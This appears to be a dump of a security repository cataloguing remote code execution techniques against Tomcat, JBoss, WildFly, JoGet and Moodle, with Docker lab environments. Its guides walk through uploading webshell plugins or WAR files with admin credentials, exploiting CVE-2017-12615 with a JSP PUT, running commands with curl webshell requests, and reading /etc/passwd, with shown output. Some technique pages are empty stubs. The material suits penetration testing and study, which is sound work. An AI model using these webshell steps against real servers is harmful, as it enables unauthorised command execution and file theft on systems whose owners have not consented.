"https://github.com/p0dalirius/Wordpress-webshell-plugin" 7 | ] 8 | } -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/test_env/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:latest 2 | 3 | ENV WORDPRESS_VERSION 5.9.3 4 | 5 | RUN apt-get -y -q update; \ 6 | apt-get -y -q install apache2 xxd git unzip wget php php-simplexml php-gd php-ldap php-zip php-imap php-mysql php-mbstring mariadb-client mariadb-server 7 | 8 | # Username: db 9 | # Password: db 10 | # Database Name: db 11 | RUN service mariadb start;\ 12 | mysql -u root -e "CREATE DATABASE db; CREATE USER 'db'@'%' IDENTIFIED BY 'db'; GRANT ALL PRIVILEGES ON *.* TO 'db'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES;" 13 | 14 | RUN wget -q https://wordpress.org/wordpress-${WORDPRESS_VERSION}.tar.gz -O /tmp/wordpress.tar.gz ;\ 15 | cd /var/www/html/; rm index.html; tar xf /tmp/wordpress.tar.gz 16 | 17 | RUN chown www-data: -R /var/www/ 18 | 19 | RUN echo "#!/bin/bash" > /entrypoint.sh ;\ 20 | echo "service mariadb start" >> /entrypoint.sh ;\ 21 | echo "apachectl -D FOREGROUND" >> /entrypoint.sh ;\ 22 | chmod +x /entrypoint.sh 23 | 24 | EXPOSE 80 25 | 26 | CMD /entrypoint.sh 27 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/test_env/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: build img 2 | 3 | IMGNAME := awesome_rce_wordpress_upload_plugin 4 | PORT := 10080 5 | 6 | all : build 7 | 8 | build: 9 | docker build -t $(IMGNAME):latest -f Dockerfile . 10 | 11 | start: build 12 | docker run --rm -it -p $(PORT):80 $(IMGNAME) 13 | 14 | background: 15 | docker run --rm -d -p $(PORT):80 $(IMGNAME) 16 | 17 | shell: 18 | docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash 19 | 20 | stop: 21 | docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/wpterm.1.1.9.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/wpterm.1.1.9.zip -------------------------------------------------------------------------------- /Frameworks/Apache-Tomcat/README.md: -------------------------------------------------------------------------------- 1 | # Apache Tomcat 2 | 3 | Apache Tomcat is an open-source implementation of the Java Servlet, JavaServer Pages, Java Expression Language and WebSocket technologies. Tomcat provides a "pure Java" HTTP web server environment in which Java code can run. 4 | 5 | ## Techniques to achieve RCE with Tomcat 6 | 7 | ### Generic 8 | 9 | - [Deploy an application](./techniques/Deploy-an-application/README.md) 10 | 11 | ### Version specific 12 | 13 | - [CVE-2017-12615 - PUT a jsp file](./techniques/CVE-2017-12615_-_PUT_a_jsp_file/README.md) 14 | 15 | -------------------------------------------------------------------------------- /Frameworks/Apache-Tomcat/techniques/CVE-2017-12615_-_PUT_a_jsp_file/README.md: -------------------------------------------------------------------------------- 1 | # Apache Tomcat - CVE-2017-12615 - PUT a jsp file 2 | 3 | ## Requirements 4 | 5 | - None 6 | 7 | ## Exploitation 8 | 9 | ### Step 1: Whitelist your IP in the API 10 | 11 | ### Step 2: Upload your JSP file 12 | 13 | ```sh 14 | curl -X PUT http://localhost/shell.jsp/ -d @- < test.jsp 15 | ``` 16 | 17 | ## References 18 | - https://tomcat.apache.org/ 19 | -------------------------------------------------------------------------------- /Frameworks/Apache-Tomcat/techniques/CVE-2017-12615_-_PUT_a_jsp_file/technique.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Apache Tomcat - CVE-2017-12615 - PUT a jsp file", 3 | "work_in_progress": false, 4 | "references": [ 5 | "https://tomcat.apache.org/" 6 | ] 7 | } -------------------------------------------------------------------------------- /Frameworks/Apache-Tomcat/techniques/Deploy-an-application/README.md: -------------------------------------------------------------------------------- 1 | # Apache Tomcat - Deploy an Application 2 | 3 | ## Requirements 4 | 5 | - A valid **username and password** of a user with high privileges on Apache Tomcat. 6 | 7 | ## Exploitation 8 | 9 | ### Step 1: Access the Tomcat manager and upload the webshell application 10 | 11 | First of all, you will need to access the Apache Tomcat `/manager` page at http://TARGET:10080/manager/html, and connect to it with an high privilege account of the Apache Tomcat server. 12 | 13 | ![](./imgs/manager.png) 14 | 15 | Compile the webshell application or download a release here: https://github.com/p0dalirius/Tomcat-application-webshell/. Then choose the WAR file of the [webshell application](https://github.com/p0dalirius/Tomcat-application-webshell/) and click on "Deploy": 16 | 17 | ![](./imgs/upload_a_plugin.png) 18 | 19 | And the application is deployed: 20 | 21 | ![](./imgs/webshell_uploaded.png) 22 | 23 | ### Step 2.1: Executing commands 24 | 25 | You can now execute commands by sending a GET or POST request to http://TARGET:10080/webshell/api with `action=exec&cmd=id`: 26 | 27 | ```sh 28 | $ curl -X POST 'http://TARGET:10080/webshell/api' --data "action=exec&cmd=id" 29 | {"stdout":"uid=0(root) gid=0(root) groups=0(root)\n","stderr":"","exec":["/bin/bash","-c","id"]} 30 | ``` 31 | 32 | You can also access it by a GET request from a browser: 33 | 34 | ![](./imgs/exec_code_web.png) 35 | 36 | ### Step 2.2: Downloading files 37 | 38 | You can also download remote files by sending a GET or POST request to http://TARGET:10080/webshell/api with `action=download&cmd=/etc/passwd`: 39 | 40 | ```sh 41 | $ curl -X POST 'http://TARGET:10080/webshell/api' --data "action=download&path=/etc/passwd" -o- 42 | root:x:0:0:root:/root:/bin/bash 43 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 44 | bin:x:2:2:bin:/bin:/usr/sbin/nologin 45 | sys:x:3:3:sys:/dev:/usr/sbin/nologin 46 | sync:x:4:65534:sync:/bin:/bin/sync 47 | games:x:5:60:games:/usr/games:/usr/sbin/nologin 48 | man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 49 | lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 50 | mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 51 | news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 52 | uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 53 | proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 54 | www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 55 | backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 56 | list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 57 | irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 58 | gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 59 | nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 60 | _apt:x:100:65534::/nonexistent:/usr/sbin/nologin 61 | ``` 62 | 63 | ### Step 3: The interactive console 64 | 65 | When your webshell is active, you can now use the interactive [console.py](https://github.com/p0dalirius/Tomcat-application-webshell/console.py) to execute commands and download remote files. 66 | 67 | https://user-images.githubusercontent.com/79218792/168489455-023b52c5-e8a9-4cd9-96ca-f26c14304236.mp4 68 | 69 | ## References 70 | - https://tomcat.apache.org/ 71 | - https://github.com/p0dalirius/Tomcat-application-webshell/ 72 | -------------------------------------------------------------------------------- /Frameworks/Apache-Tomcat/techniques/Deploy-an-application/imgs/compile.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Frameworks/Apache-Tomcat/techniques/Deploy-an-application/imgs/compile.png -------------------------------------------------------------------------------- /Frameworks/Apache-Tomcat/techniques/Deploy-an-application/imgs/exec_code_web.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Frameworks/Apache-Tomcat/techniques/Deploy-an-application/imgs/exec_code_web.png -------------------------------------------------------------------------------- /Frameworks/Apache-Tomcat/techniques/Deploy-an-application/imgs/manager.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Frameworks/Apache-Tomcat/techniques/Deploy-an-application/imgs/manager.png -------------------------------------------------------------------------------- /Frameworks/Apache-Tomcat/techniques/Deploy-an-application/imgs/upload_a_plugin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Frameworks/Apache-Tomcat/techniques/Deploy-an-application/imgs/upload_a_plugin.png -------------------------------------------------------------------------------- /Frameworks/Apache-Tomcat/techniques/Deploy-an-application/imgs/webshell_uploaded.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Frameworks/Apache-Tomcat/techniques/Deploy-an-application/imgs/webshell_uploaded.png -------------------------------------------------------------------------------- /Frameworks/Apache-Tomcat/techniques/Deploy-an-application/technique.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Apache Tomcat - Deploy an Application", 3 | "work_in_progress": false, 4 | "references": [ 5 | "https://tomcat.apache.org/", 6 | "https://github.com/p0dalirius/Tomcat-application-webshell/" 7 | ] 8 | } -------------------------------------------------------------------------------- /Frameworks/Apache-Tomcat/techniques/Deploy-an-application/test_env/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tomcat:9.0.62-jdk11-openjdk-slim-buster 2 | 3 | # https://octopus.com/blog/deployable-tomcat-docker-containers 4 | 5 | RUN mv /usr/local/tomcat/webapps /usr/local/tomcat/webapps2 ;\ 6 | mv /usr/local/tomcat/webapps.dist /usr/local/tomcat/webapps 7 | 8 | COPY ./files/context.xml /usr/local/tomcat/webapps/manager/META-INF/context.xml 9 | COPY ./files/tomcat-users.xml /usr/local/tomcat/conf/tomcat-users.xml 10 | 11 | CMD ["catalina.sh", "run"] 12 | -------------------------------------------------------------------------------- /Frameworks/Apache-Tomcat/techniques/Deploy-an-application/test_env/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: build img 2 | 3 | IMGNAME := awesome_rce_tomcat_upload_plugin 4 | PORT := 10080 5 | 6 | all : build 7 | 8 | build: 9 | docker build -t $(IMGNAME):latest -f Dockerfile . 10 | 11 | start: 12 | docker run --rm -it -p $(PORT):8080 $(IMGNAME) 13 | 14 | background: 15 | docker run --rm -d -p $(PORT):8080 $(IMGNAME) 16 | 17 | shell: 18 | docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash 19 | 20 | stop: 21 | docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') -------------------------------------------------------------------------------- /Frameworks/Apache-Tomcat/techniques/Deploy-an-application/test_env/files/context.xml: -------------------------------------------------------------------------------- 1 | 2 | 6 | 7 | -------------------------------------------------------------------------------- /Frameworks/Apache-Tomcat/techniques/Deploy-an-application/test_env/files/tomcat-users.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Frameworks/JBoss/README.md: -------------------------------------------------------------------------------- 1 | # JBoss 2 | 3 | JBoss is an open-source platform that can aid the enterprises in the implementation of JAVA EE apps. It is an integrated development environment and middleware software for further development and enhancement of applications. JBoss is platform friendly and is quite easy to use. 4 | 5 | ## Techniques to achieve RCE on JBoss 6 | 7 | ### With admin credentials 8 | 9 | - [Upload a plugin](./techniques/Upload-a-plugin/README.md) 10 | 11 | https://github.com/joaomatosf/jexboss -------------------------------------------------------------------------------- /Frameworks/JBoss/techniques/Upload-a-plugin/README.md: -------------------------------------------------------------------------------- 1 | # JBoss - Upload a plugin 2 | 3 | ## Requirements 4 | 5 | - A valid **username and password** of a user with **admin rights** on JBoss. 6 | 7 | ## Exploitation 8 | 9 | ### Step 1: Whitelist your IP in the API 10 | 11 | 12 | 13 | ## References 14 | - https://github.com/joaomatosf/jexboss -------------------------------------------------------------------------------- /Frameworks/JBoss/techniques/Upload-a-plugin/technique.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "JBoss - Upload a plugin", 3 | "work_in_progress": false, 4 | "references": [ 5 | "https://github.com/joaomatosf/jexboss" 6 | ] 7 | } -------------------------------------------------------------------------------- /Frameworks/JBoss/techniques/Upload-a-plugin/test_env/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM quay.io/wildfly/wildfly 2 | RUN /opt/jboss/wildfly/bin/add-user.sh admin admin --silent 3 | CMD ["/opt/jboss/wildfly/bin/standalone.sh", "-b", "0.0.0.0", "-bmanagement", "0.0.0.0"] -------------------------------------------------------------------------------- /Frameworks/JBoss/techniques/Upload-a-plugin/test_env/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: build img 2 | 3 | IMGNAME := awesome_rce_jboss 4 | PORT := 9990 5 | 6 | all : build 7 | 8 | build: 9 | docker build -t $(IMGNAME):latest -f Dockerfile . 10 | 11 | start: 12 | docker run --rm -it -p $(PORT):9990 $(IMGNAME) 13 | 14 | background: 15 | docker run --rm -d -p $(PORT):9990 $(IMGNAME) 16 | 17 | shell: 18 | docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash 19 | 20 | stop: 21 | docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') -------------------------------------------------------------------------------- /Frameworks/JoGet/README.md: -------------------------------------------------------------------------------- 1 | # JoGet 2 | 3 | Joget DX is a new and next generation open source low-code platform for faster, simpler digital transformation (DX) 4 | 5 | ## Techniques to achieve RCE on JoGet 6 | 7 | ### With admin credentials 8 | 9 | - [Upload a plugin](./techniques/Upload-a-plugin/README.md) 10 | -------------------------------------------------------------------------------- /Frameworks/JoGet/techniques/Upload-a-plugin/README.md: -------------------------------------------------------------------------------- 1 | # JoGet - Upload a plugin 2 | 3 | ## Requirements 4 | 5 | - A valid **username and password** of a user with **admin rights** on JoGet. 6 | 7 | ## Exploitation 8 | 9 | ### Step 1: Whitelist your IP in the API 10 | 11 | First of all, you will need to whitelist your IP in the API (or put `*` to match every source IP). This will allow you to perform requests on the `/jw/web/json` endpoint. 12 | 13 | - **API Domain Whitelist**: `*` 14 | - **API IP Whitelist**: `*` 15 | 16 | ![](./imgs/ip_whitelist_api.png) 17 | 18 | ### Step 2: Upload the webshell plugin 19 | 20 | Go to "Manage plugins" page, at http://127.0.0.1:8000/jw/web/console/setting/plugin, and click on "Upload plugin": 21 | 22 | ![](./imgs/manage_plugins_interface.png) 23 | 24 | Compile the webshell plugin or download a release here: https://github.com/p0dalirius/JoGet-plugin-webshell/. Then choose the JAR file of the [webshell application](https://github.com/p0dalirius/JoGet-plugin-webshell) and click on "Upload": 25 | 26 | ![](./imgs/upload_a_plugin.png) 27 | 28 | ### Step 3.1: Executing commands 29 | 30 | You can now execute commands by sending a GET or POST request to http://127.0.0.1:8000/jw/web/json/plugin/podalirius.WebShell/service with `action=exec&cmd=id`: 31 | 32 | ```sh 33 | $ curl -X POST 'http://127.0.0.1:8000/jw/web/json/plugin/podalirius.WebShell/service' --data "action=exec&cmd=id" 34 | {"stdout":"uid=1000(tomcat) gid=1000(tomcat) groups=1000(tomcat),0(root),27(sudo)\n","stderr":"","exec":["/bin/bash","-c","id"]} 35 | ``` 36 | 37 | You can also access it by a GET request from a browser: 38 | 39 | ![](./imgs/exec_code_web.png) 40 | 41 | ### Step 3.2: Downloading files 42 | 43 | You can also download remote files by sending a GET or POST request to http://127.0.0.1:8000/jw/web/json/plugin/podalirius.WebShell/service with `action=download&cmd=/etc/passwd`: 44 | 45 | ```sh 46 | $ curl -X POST 'http://127.0.0.1:8000/jw/web/json/plugin/podalirius.WebShell/service' --data "action=download&path=/etc/passwd" -o- 47 | root:x:0:0:root:/root:/bin/bash 48 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 49 | bin:x:2:2:bin:/bin:/usr/sbin/nologin 50 | sys:x:3:3:sys:/dev:/usr/sbin/nologin 51 | sync:x:4:65534:sync:/bin:/bin/sync 52 | games:x:5:60:games:/usr/games:/usr/sbin/nologin 53 | man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 54 | lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 55 | mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 56 | news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 57 | uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 58 | proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 59 | www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 60 | backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 61 | list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 62 | irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 63 | gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 64 | nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 65 | _apt:x:100:65534::/nonexistent:/usr/sbin/nologin 66 | mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false 67 | tomcat:x:1000:1000::/home/tomcat:/bin/sh 68 | ``` 69 | 70 | ### Step 4: The interactive console 71 | 72 | When your webshell is active, you can now use the interactive [console.py](https://raw.githubusercontent.com/p0dalirius/JoGet-plugin-webshell/master/console.py) to execute commands and download remote files. 73 | 74 | https://user-images.githubusercontent.com/79218792/158264654-df612180-9de5-4b5b-b3a2-ad22ae05b889.mp4 75 | 76 | ## References 77 | - https://github.com/p0dalirius/JoGet-plugin-webshell -------------------------------------------------------------------------------- /Frameworks/JoGet/techniques/Upload-a-plugin/imgs/demo.mp4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Frameworks/JoGet/techniques/Upload-a-plugin/imgs/demo.mp4 -------------------------------------------------------------------------------- /Frameworks/JoGet/techniques/Upload-a-plugin/imgs/exec_code_web.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Frameworks/JoGet/techniques/Upload-a-plugin/imgs/exec_code_web.png -------------------------------------------------------------------------------- /Frameworks/JoGet/techniques/Upload-a-plugin/imgs/ip_whitelist_api.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Frameworks/JoGet/techniques/Upload-a-plugin/imgs/ip_whitelist_api.png -------------------------------------------------------------------------------- /Frameworks/JoGet/techniques/Upload-a-plugin/imgs/manage_plugins_interface.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Frameworks/JoGet/techniques/Upload-a-plugin/imgs/manage_plugins_interface.png -------------------------------------------------------------------------------- /Frameworks/JoGet/techniques/Upload-a-plugin/imgs/plugin_installed_and_ready.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Frameworks/JoGet/techniques/Upload-a-plugin/imgs/plugin_installed_and_ready.png -------------------------------------------------------------------------------- /Frameworks/JoGet/techniques/Upload-a-plugin/imgs/upload_a_plugin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Frameworks/JoGet/techniques/Upload-a-plugin/imgs/upload_a_plugin.png -------------------------------------------------------------------------------- /Frameworks/JoGet/techniques/Upload-a-plugin/technique.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "JoGet - Upload a plugin", 3 | "work_in_progress": false, 4 | "references": [ 5 | "https://github.com/p0dalirius/JoGet-plugin-webshell" 6 | ] 7 | } -------------------------------------------------------------------------------- /Frameworks/JoGet/techniques/Upload-a-plugin/test_env/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM jogetworkflow/joget-community:7.0.29 2 | -------------------------------------------------------------------------------- /Frameworks/JoGet/techniques/Upload-a-plugin/test_env/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: build img 2 | 3 | IMGNAME := awesome_rce_joget_upload_plugin 4 | PORT := 8080 5 | 6 | all : build 7 | 8 | build: 9 | docker build -t $(IMGNAME):latest -f Dockerfile . 10 | 11 | start: 12 | docker run --rm -it -p $(PORT):8080 $(IMGNAME) 13 | 14 | background: 15 | docker run --rm -d -p $(PORT):8080 $(IMGNAME) 16 | 17 | shell: 18 | docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash 19 | 20 | stop: 21 | docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') -------------------------------------------------------------------------------- /Frameworks/README.md: -------------------------------------------------------------------------------- 1 | # Frameworks 2 | 3 | ## Softwares 4 | 5 | - [**Apache-Tomcat**: (2 techniques)](./Apache-Tomcat/) 6 | - [**JBoss**: (1 technique)](./JBoss/) 7 | - [**JoGet**: (1 technique)](./JoGet/) 8 | - [**WildFly**: (1 technique)](./WildFly/) 9 | -------------------------------------------------------------------------------- /Frameworks/WildFly/README.md: -------------------------------------------------------------------------------- 1 | # WildFly 2 | 3 | WildFly, formerly known as JBoss AS, or simply JBoss, is an application server written by JBoss, now developed by Red Hat. WildFly is written in Java and implements the Java Platform, Enterprise Edition specification. It runs on multiple platforms. WildFly is free and open-source software, subject to the requirements of the GNU Lesser General Public License, version 2.1. 4 | 5 | ## Techniques to achieve RCE on WildFly 6 | 7 | ### With admin credentials 8 | 9 | - [Deploy an application](./techniques/Deploy-an-application/README.md) 10 | -------------------------------------------------------------------------------- /Frameworks/WildFly/techniques/Deploy-an-application/README.md: -------------------------------------------------------------------------------- 1 | # WildFly - Deploy an Application 2 | 3 | ## Requirements 4 | 5 | - A valid **username and password** of a user with **admin rights** on WildFly. 6 | 7 | ## Exploitation 8 | 9 | 10 | 11 | ## References 12 | - -------------------------------------------------------------------------------- /Frameworks/WildFly/techniques/Deploy-an-application/imgs/wildfly_console.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Frameworks/WildFly/techniques/Deploy-an-application/imgs/wildfly_console.png -------------------------------------------------------------------------------- /Frameworks/WildFly/techniques/Deploy-an-application/imgs/wildfly_console_login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Frameworks/WildFly/techniques/Deploy-an-application/imgs/wildfly_console_login.png -------------------------------------------------------------------------------- /Frameworks/WildFly/techniques/Deploy-an-application/technique.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "WildFly - Deploy an Application", 3 | "work_in_progress": false, 4 | "references": [] 5 | } -------------------------------------------------------------------------------- /Frameworks/WildFly/techniques/Deploy-an-application/test_env/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM quay.io/wildfly/wildfly 2 | 3 | RUN /opt/jboss/wildfly/bin/add-user.sh admin admin --silent 4 | 5 | CMD ["/opt/jboss/wildfly/bin/standalone.sh", "-b", "0.0.0.0", "-bmanagement", "0.0.0.0"] -------------------------------------------------------------------------------- /Frameworks/WildFly/techniques/Deploy-an-application/test_env/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: build img 2 | 3 | IMGNAME := awesome_rce_wildfly 4 | 5 | all : build 6 | 7 | build: 8 | docker build -t $(IMGNAME):latest -f Dockerfile . 9 | 10 | start: 11 | docker run --rm -it -p 8080:8080 -p 9990:9990 $(IMGNAME) 12 | 13 | background: 14 | docker run --rm -d -p 8080:8080 -p 9990:9990 $(IMGNAME) 15 | 16 | shell: 17 | docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash 18 | 19 | stop: 20 | docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') -------------------------------------------------------------------------------- /Learning-Management-Systems-(LMS)/Moodle/README.md: -------------------------------------------------------------------------------- 1 | # Moodle 2 | 3 | Moodle is a free and open-source learning management system written in PHP and distributed under the GNU General Public License. Developed on pedagogical principles, Moodle is used for blended learning, distance education, flipped classroom and other e-learning projects in schools, universities, workplaces and other sectors. 4 | 5 | - https://moodle.org/ 6 | 7 | ## Techniques to achieve RCE on Moodle 8 | 9 | ### With admin credentials 10 | 11 | - [Upload a plugin](./techniques/Upload-a-plugin/README.md) 12 | -------------------------------------------------------------------------------- /Learning-Management-Systems-(LMS)/Moodle/techniques/Upload-a-plugin/README.md: -------------------------------------------------------------------------------- 1 | # Moodle - Upload a plugin 2 | 3 | ## Requirements 4 | 5 | - A valid **username and password** of a user with **admin rights** on Moodle. 6 | 7 | ## Exploitation 8 | 9 | ### Step 1.1: Upload the webshell plugin 10 | 11 | Go to "Site administration --> Install plugins" page, at http://127.0.0.1:10080/admin/tool/installaddon/index.php, and click on "_Choose a file_": 12 | 13 | ![](./imgs/upload_and_install.png) 14 | 15 | ### Step 1.2: Plugin successfully uploaded 16 | 17 | Press the buttons on the various pages until you get a message stating that your plugin is successfully uploaded: 18 | 19 | ![](./imgs/plugin_successfully_uploaded.png) 20 | 21 | ### Step 2.1: Executing commands 22 | 23 | You can now execute commands by sending a GET or POST request to http://127.0.0.1:10080/local/moodle_webshell/webshell.php with `action=exec&cmd=id`: 24 | 25 | ```sh 26 | $ curl -X POST 'http://127.0.0.1:10080/local/moodle_webshell/webshell.php' --data "action=exec&cmd=id" 27 | {"stdout":"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n","exec":"id"} 28 | ``` 29 | 30 | You can also access it by a GET request from a browser: 31 | 32 | ![](./imgs/exec_code_web.png) 33 | 34 | ### Step 2.2: Downloading files 35 | 36 | You can also download remote files by sending a GET or POST request to http://127.0.0.1:10080/local/moodle_webshell/webshell.php with `action=download&cmd=/etc/passwd`: 37 | 38 | ```sh 39 | $ curl -X POST 'http://127.0.0.1:10080/local/moodle_webshell/webshell.php' --data "action=download&path=/etc/passwd" -o- 40 | root:x:0:0:root:/root:/bin/bash 41 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 42 | bin:x:2:2:bin:/bin:/usr/sbin/nologin 43 | sys:x:3:3:sys:/dev:/usr/sbin/nologin 44 | sync:x:4:65534:sync:/bin:/bin/sync 45 | games:x:5:60:games:/usr/games:/usr/sbin/nologin 46 | man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 47 | lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 48 | mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 49 | news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 50 | uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 51 | proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 52 | www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 53 | backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 54 | list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 55 | irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 56 | gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 57 | nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 58 | _apt:x:100:65534::/nonexistent:/usr/sbin/nologin 59 | mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false 60 | ``` 61 | 62 | You can also download a remote file from a browser with a GET request : 63 | 64 | ![](./imgs/download_file_web.png) 65 | 66 | ### Step 3: The interactive console 67 | 68 | When your webshell is active, you can now use the interactive [console.py](console.py) to execute commands and download remote files. 69 | 70 | https://user-images.githubusercontent.com/79218792/169657310-dee340d6-19c0-4192-bcd1-ac8b9b29b731.mp4 71 | 72 | ## References 73 | - https://github.com/joaomatosf/jexboss 74 | -------------------------------------------------------------------------------- /Learning-Management-Systems-(LMS)/Moodle/techniques/Upload-a-plugin/imgs/Install_plugins_page.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Learning-Management-Systems-(LMS)/Moodle/techniques/Upload-a-plugin/imgs/Install_plugins_page.png -------------------------------------------------------------------------------- /Learning-Management-Systems-(LMS)/Moodle/techniques/Upload-a-plugin/imgs/choose_plugin_zip_file.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Learning-Management-Systems-(LMS)/Moodle/techniques/Upload-a-plugin/imgs/choose_plugin_zip_file.png -------------------------------------------------------------------------------- /Learning-Management-Systems-(LMS)/Moodle/techniques/Upload-a-plugin/imgs/download_file_web.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Learning-Management-Systems-(LMS)/Moodle/techniques/Upload-a-plugin/imgs/download_file_web.png -------------------------------------------------------------------------------- /Learning-Management-Systems-(LMS)/Moodle/techniques/Upload-a-plugin/imgs/exec_code_web.png: 